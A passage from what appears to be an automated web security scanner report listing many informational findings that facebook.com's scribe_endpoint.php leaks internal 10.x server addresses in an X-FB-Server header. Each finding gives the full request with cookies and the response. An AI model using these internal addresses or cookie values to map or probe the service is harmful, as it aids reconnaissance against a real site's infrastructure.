Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aa7a87a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.6.113
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:36 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.442. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.18.61

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A728%2C%22baseline_elapsed%22%3A683%7D&asyncSignal=9324 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df334529e3c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3f366f4d8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.63.18.61
X-Cnection: close
Date: Thu, 16 Jun 2011 12:35:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.443. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.188.121

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1268%2C%22baseline_elapsed%22%3A1252%7D&asyncSignal=8437 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3871537c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.188.121
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:06 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.444. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.168.30

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1264%2C%22baseline_elapsed%22%3A1265%7D&asyncSignal=4142 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d1bef9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.168.30
X-Cnection: close
Date: Thu, 16 Jun 2011 17:15:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.445. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.218.102

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1900%2C%22baseline_elapsed%22%3A1814%7D&asyncSignal=5142 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.218.102
X-Cnection: close
Date: Thu, 16 Jun 2011 18:17:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.446. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.144.54

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1229%2C%22baseline_elapsed%22%3A1230%7D&asyncSignal=8056 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cbc50a64%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff112cf8d98%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.144.54
X-Cnection: close
Date: Thu, 16 Jun 2011 17:15:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.447. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.121.44

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1229%2C%22baseline_elapsed%22%3A1230%7D&asyncSignal=7851 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2397668d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.121.44
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:14 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.448. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.27.117

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1176%2C%22baseline_elapsed%22%3A1194%7D&asyncSignal=5547 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df752e1b1c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.27.27.117
X-Cnection: close
Date: Thu, 16 Jun 2011 13:58:36 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.449. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.155.34

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A2152%2C%22baseline_elapsed%22%3A2152%7D&asyncSignal=5807 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.155.34
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:39 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.450. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.13.25

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1186%2C%22baseline_elapsed%22%3A1337%7D&asyncSignal=810 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1587192ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.43.13.25
X-Cnection: close
Date: Thu, 16 Jun 2011 14:19:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.451. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.174.52

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A488%2C%22baseline_elapsed%22%3A1633%7D&asyncSignal=8894 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.174.52
X-Cnection: close
Date: Thu, 16 Jun 2011 16:54:13 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.452. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.41.65

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1566%2C%22baseline_elapsed%22%3A1652%7D&asyncSignal=5023 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.41.65
X-Cnection: close
Date: Thu, 16 Jun 2011 15:46:59 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.453. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.1.65

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1500%2C%22baseline_elapsed%22%3A1514%7D&asyncSignal=2521 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.1.65
X-Cnection: close
Date: Thu, 16 Jun 2011 12:41:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.454. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.234.21

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1288%2C%22baseline_elapsed%22%3A1282%7D&asyncSignal=8190 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df163c489c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.42.234.21
X-Cnection: close
Date: Thu, 16 Jun 2011 12:10:02 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.455. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.168.58

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1224%2C%22baseline_elapsed%22%3A1224%7D&asyncSignal=8816 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18d5e5274%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1de4dacf4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.168.58
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:53 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.456. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.209.44

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1485%2C%22baseline_elapsed%22%3A1556%7D&asyncSignal=1440 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.209.44
X-Cnection: close
Date: Thu, 16 Jun 2011 14:14:01 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.457. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.225.39

Request

